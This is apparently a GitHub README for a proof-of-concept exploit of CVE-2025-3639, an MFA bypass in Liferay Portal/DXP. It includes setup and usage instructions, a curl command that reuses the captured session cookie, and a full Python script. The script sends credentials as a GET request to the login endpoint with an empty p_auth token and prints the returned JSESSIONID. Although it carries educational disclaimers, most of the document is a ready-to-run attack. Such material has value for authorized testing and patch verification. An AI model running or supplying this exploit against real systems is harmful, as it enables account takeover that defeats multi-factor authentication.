# CVE-2025-3639 PoC - Liferay Portal/DXP Login Bypass

This repository contains a Proof of Concept (PoC) for **CVE-2025-3639**, a login bypass vulnerability in Liferay Portal (versions 7.3.0–7.4.3.132) and Liferay DXP (various versions from 2024.Q1 to 2025.Q1.6). The PoC demonstrates how an unauthenticated user with valid credentials can bypass multi-factor authentication (MFA) by modifying a POST request to a GET request, potentially gaining unauthorized access to user accounts.

**Warning**: This PoC is for **educational purposes only**. Unauthorized testing or exploitation of this vulnerability is illegal and unethical. Use only with explicit written permission from the system owner.

## Requirements

- **Environment**: Linux (e.g., Kali Linux, Ubuntu, or a virtualized setup).
- **Dependencies**:
  ```bash
  sudo apt-get update
  sudo apt-get install python3 python3-requests
  pip3 install requests
  ```
- **Network**: Access to a target Liferay Portal/DXP instance (must be in a test environment with explicit permission).
- **Credentials**: Valid user credentials for the target Liferay instance.

## Installation

1. Clone the repository:
   ```bash
   git clone https://github.com/6lj/CVE-2025-3639.git
   cd CVE-2025-3639
   ```

2. Ensure Python 3 and the `requests` library are installed:
   ```bash
   pip3 install requests
   ```

## What It Does

- The PoC exploits CVE-2025-3639 by modifying a login POST request to a GET request, bypassing MFA checks.
- It sends a crafted HTTP GET request with valid credentials to authenticate without completing the MFA process.
- The script is designed to demonstrate the vulnerability in a controlled, authorized environment.

## Usage

Run the PoC script with the appropriate arguments (replace `<target_url>`, `<username>`, and `<password>` with the target Liferay instance URL and valid credentials).

### `poc.py`
```bash
python3 poc.py --target <target_url> --username <username> --password <password>
```

- **Parameters**:
  - `--target`: The URL of the Liferay Portal/DXP instance (e.g., `http://example.com`).
  - `--username`: Valid username for the target instance.
  - `--password`: Valid password for the username.

### Example
```bash
python3 poc.py --target http://192.168.1.100 --username test@example.com --password Test123!
```

## Verify Results

- **Success**: If the exploit works, the script will return a valid session token or a success message indicating access to the user account without MFA.
  ```bash
  curl -b "COOKIE=<session_token>" http://<target_url>/api/jsonws/user/get-current-user
  ```
  - Expected output: User details confirming successful authentication.
- **Failure**: If the server returns an error (e.g., `401 Unauthorized` or `403 Forbidden`), the instance may not be vulnerable, or MFA is not enabled.

- **Monitor Traffic**: Use a tool like Wireshark to inspect HTTP traffic:
  ```bash
  sudo wireshark -f "tcp port 80 or tcp port 443"
  ```

## PoC Script

Below is the sample code for `poc.py`:

```python
import requests
import argparse

def exploit(target, username, password):
    print(f"[*] Attempting CVE-2025-3639 exploit on {target}")
    login_url = f"{target}/c/portal/login"

    params = {
        "p_auth": "",
        "login": username,
        "password": password
    }
    
    try:
        response = requests.get(login_url, params=params, allow_redirects=True)
        if response.status_code == 200 and "JSESSIONID" in response.cookies:
            print(f"[+] Success! Session token: {response.cookies['JSESSIONID']}")
            return True
        else:
            print(f"[-] Failed: {response.status_code} - {response.text}")
            return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-3639 PoC for Liferay Portal/DXP")
    parser.add_argument("--target", required=True, help="Target Liferay URL (e.g., http://example.com)")
    parser.add_argument("--username", required=True, help="Valid username")
    parser.add_argument("--password", required=True, help="Valid password")
    args = parser.parse_args()
    
    exploit(args.target, args.username, args.password)
```

## Important Notes

- This PoC requires valid credentials, as the vulnerability allows bypassing MFA but not guessing credentials.
- Test only in a controlled environment with explicit permission from the system owner.
- The vulnerability has been patched in newer versions of Liferay Portal/DXP. Update to the latest version to mitigate this issue.
- [Liferay Security Advisory](https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2025-3639-1)
- [NVD CVE-2025-3639](https://nvd.nist.gov/vuln/detail/CVE-2025-3639)
- [GitHub Repository](https://github.com/6lj/CVE-2025-3639)

## Disclaimer

This project is for **educational purposes only**. The author is not responsible for any unauthorized or illegal use of this PoC. Always obtain explicit permission from the system owner before testing.
